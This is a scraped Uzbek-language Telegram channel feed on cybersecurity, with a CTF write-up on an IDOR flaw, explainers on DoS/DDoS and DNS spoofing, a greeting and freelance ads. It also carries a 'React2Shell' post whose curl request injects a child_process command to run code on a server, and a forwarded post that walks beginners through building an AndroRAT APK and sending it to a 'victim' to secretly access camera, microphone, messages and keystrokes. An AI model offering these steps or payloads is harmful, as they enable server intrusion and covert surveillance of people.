Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi siz esa TASHKILOT BOSHLIG'I malumotlariga kirishingiz kerak
#CyberLab
Please open Telegram to view this post
VIEW IN TELEGRAM
𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃
https://t.me/uzcodingblog/556?comment=5752
ZAIFLIK TOPILDI
ZAIFLIK TOPILDI
Qanday ishladi?
Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz.
Xato qayerda?
Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.
Yurtimizning muhtaram va aziz ayollari!
Sizlarni 8 mart — Xalqaro xotin-qizlar bayrami bilan tabriklayman
Mamlakatimiz taraqqiyoti, jamiyat ravnaqi va kelajak avlodni tarbiyalashda xotin-qizlarning o‘rni beqiyosdir. Sizlar o‘zingizning fidokorona mehnatingiz, yuksak mas’uliyatingiz va mehr-oqibatingiz bilan har bir sohada munosib hissa qo‘shib kelmoqdasiz.
Shu fayzli bahor ayyomida sizlarga mustahkam sog‘liq, oilaviy baxt-saodat, xonadonlaringizga tinchlik-xotirjamlik, mas’uliyatli faoliyatingizda ulkan yutuqlar tilayman!
@ozodbekdevv
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥4❤2💘1
Forwarded from UzCERT Live
#Google #Chrome #Windows #macOS #Linux #zaiflik
Please open Telegram to view this post
VIEW IN TELEGRAM
React2Shell (CVE-2025-55182)
- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- Taʼsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 – 10.0 (Critical)
Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi.
Muammo RSC “Flight protocol” maʼlumotlarini notoʻgʻri qayta ishlash bilan bogʻliq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. Shuningdek 15million aholi malumotlari aynan shu zaiflik asosida olingan
- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- Taʼsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 – 10.0 (Critical)
@uzcodingblog
Foydalanish:
Ushbu zaiflikdan faqat React oʻrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
Foydalanilgan texnologiyalar orasida React mavjud boʻlsa bu serverda React2Shell zaifligi boʻlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
Bu orqali server terminalida whois buyrugʻini berdik va javob ubuntu tarzida chiqadi
Ushbu zaiflikdan faqat React oʻrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
npm install -g wappalyzer
wappalyzer https://example.com
Foydalanilgan texnologiyalar orasida React mavjud boʻlsa bu serverda React2Shell zaifligi boʻlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'
Bu orqali server terminalida whois buyrugʻini berdik va javob ubuntu tarzida chiqadi
@uzcodingblog
This media is not supported in your browser
VIEW IN TELEGRAM
❤4
This media is not supported in the widget
VIEW IN TELEGRAM
🔥4
Backup nima va nima uchun muhim?
@uzcodingblog
Dasturchi sifatida eng katta xatolardan biri — ma’lumotlarga haddan tashqari ishonib qo‘yish. Hammasi joyida ishlayotgandek tuyuladi, lekin bitta xatolik, serverdagi nosozlik yoki oddiygina noto‘g‘ri o‘chirish butun loyihani yo‘qqa chiqarishi mumkin. Backup aynan shunday vaziyatlar uchun kerak. Bu — ma’lumotlarning zaxira nusxasi bo‘lib, kerak bo‘lganda tizimni oldingi holatiga qaytarish imkonini beradi. Ayniqsa production tizimlarda backup yo‘qligi katta xavf hisoblanadi. Ko‘pincha muammo yuz bergandan keyin backup haqida o‘ylay boshlashadi. Aslida esa bu oldindan yo‘lga qo‘yilishi kerak bo‘lgan jarayon. Oddiy qilib aytganda, backup — bu sizning “plan B”ingiz. Yaxshi yondashuv esa juda murakkab emas: muntazam backup olish, uni bir nechta joyda saqlash va vaqti-vaqti bilan tiklab ko‘rish. Shunda siz kutilmagan holatlarda ham xotirjam ishlay olasiz
Backup qilinmagan loyiha — bu har doim xavf ostidagi loyiha.
@uzcodingblog
Ko'pchiligimiz bilamiz DoS, DDoS hujumlar nima ekanligi va qanday vazifa bajarishini. Lekin ko'pchilik adashadigan qism bu ikkalasini farqi nimada? Aksariyat sohaga yangi kirganlar ikkisini bir narsa deb o'ylashadi, ammo bunday emas — nomi o‘xshash, lekin darajasi va ta’siri jihatidan ancha farq qiladi. Batafsilroq tushuntiradigan bo'lsam:
DoS (Denial of Service) — bu bitta manbadan amalga oshiriladigan hujum. Oddiy qilib aytganda, bitta qurilma serverga juda ko‘p so‘rov yuboradi va uni ortiqcha yuklab qo‘yadi. Natijada server javob bera olmay qoladi yoki butunlay ishlamaydi. Bunday hujumni aniqlash va bloklash nisbatan oson — odatda bitta IP manzilni yopish yetarli bo‘ladi.
DDoS (Distributed Denial of Service) esa ancha murakkab. Bu yerda hujum bitta emas, balki minglab yoki hatto millionlab qurilmalardan bir vaqtda amalga oshiriladi. Ko‘pincha bu qurilmalar botnet bo‘ladi, ya’ni oldindan zararlangan kompyuterlar yoki IoT qurilmalar. Har biri alohida so‘rov yuboradi, lekin umumiy bosim serverni yiqitadi.
Asosiy farq — DoS bitta nuqtadan keladi, DDoS esa tarqatilgan. Shu sababli DDoS’ni aniqlash ham, himoyalanish ham ancha qiyin. IP bloklash bu yerda deyarli foyda bermaydi.
@uzcodingblog
2🔥3❤1👏1
Forwarded from V1RU5_team
Bu – sizga boshqa odamning telefonini masofadan boshqarish imkonini beradigan dastur.
Ya’ni siz o‘z kompyuteringizda o‘tirib, qurbonning telefonidagi hamma narsani ko‘rasiz va boshqarasiz.
---
Nimalarni qila oladi?
- Telefon qayerda turganini ko‘rsatadi
- Mikrofonni yoqib, atrofdagi ovozlarni eshitasiz
- Kamera bilan surat olish mumkin
- Xabarlar, kontaktlar, qo‘ng‘iroqlar ro‘yxati sizda bo‘ladi
- Telefonga fayl yuklash yoki undan fayl olib ketish mumkin
- Klaviaturada nima yozilganini ko‘rasiz (parollar ham) key
- Telefonni bloklash, ovoz chiqarish, titratish mumkin
---
Qanday ishlatiladi? (hech narsa bilmagan uchun ham tushunarli)
1. Kompyuterga server dasturini yuklab oling (bu AndroRAT ning boshqaruv paneli).
2. Serverda sozlamalarni kiriting:
- O‘z IP manzilingizni yozing (qurbon telefoni sizga ulanishi uchun).
- Kerakli funksiyalarni belgilang (masalan, kamerani yoqish, xabarlarni o‘qish).
3. Bir tugma bilan APK fayl yasang (bu dastur telefonga o‘rnatiladi).
4. Shu APK faylni qurbonga yuboring (Telegram, WhatsApp, har qanday usul).
5. Qurbon uni o‘rnatishi kerak.
*O‘rnatish uchun telefonda “Noma’lum manbalar” ruxsatini yoqish talab qilinadi.*
6. Qurbon dasturni ochgan zahoti sizning kompyuteringizda telefon paydo bo‘ladi.
7. Endi sichqoncha bilan bosib, istalgan buyruq bering: kamera, mikrofon, fayl olish – hammasi bir-ikki sekundda ishlaydi.
---
Please open Telegram to view this post
VIEW IN TELEGRAM
✅Web-sayt va Telegram bot — biznesingiz uchun zamonaviy yechimlar!
🕵♂ Fullstack dasturchi sifatida quyidagi xizmatlarimni taklif qilaman
💡 Nega bu muhim?
✉️ Bog‘lanish: @ozodbekdevv | +998932426002
🕵♂ Fullstack dasturchi sifatida quyidagi xizmatlarimni taklif qilaman
🌐 Web-saytlar – tezkor, zamonaviy, mobil qurilmalarga mos va brendingizga mos dizayn bilan.
🤖 Telegram botlar – buyurtma, to‘lov, mijozlar bilan aloqa kabi jarayonlarni avtomatlashtirish imkoniyati.
💡 Nega bu muhim?
✅Biznesingiz raqamli maydonga chiqadi
🔎Mijozlar bilan aloqa yengillashadi
🖥Ish jarayonlari optimallashtiriladi
👤Imidjingiz va ishonchingiz ortadi
📈Sotuvlar va daromad o‘sadi
👨💼 Har bir loyiha individual yondashuv bilan ishlab chiqiladi — sizning maqsadingiz biz uchun ustuvor!
✉️ Bog‘lanish: @ozodbekdevv | +998932426002
🚀 Zamonaviy texnologiyalar – sizning rivojlanishingiz uchun xizmat qiladi
V1RU5_team
GitHub
GitHub - karma9874/AndroRAT: A Simple android remote administration tool using sockets. It uses java on the client side and python…
A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side - karma9874/AndroRAT
DNS Spoofing nima?
Qanday ishlaydi?
@uzcodingblog
DNS spoofing — bu kiberhujum usuli bo‘lib, foydalanuvchini aslida kirmoqchi bo‘lgan sayt o‘rniga hujumchining nazoratidagi boshqa saytga yo‘naltirish texnikasidir. Oddiy qilib aytganda, hujumchi “manzillar tarjimonini” aldab, noto‘g‘ri IP manzil qaytaradi
Qanday ishlaydi?
Internetda har bir sayt nomi (masalan, example.com) IP manzilga bog‘langan. Foydalanuvchi brauzerga domen nomini yozganda, DNS server uni IP manzilga aylantiradi. DNS spoofingda esa hujumchi shu jarayonga aralashib, soxta javob yuboradi. Natijada foydalanuvchi hujumchi tanlagan sahifaga tushib qoladi
@uzcodingblog
❤1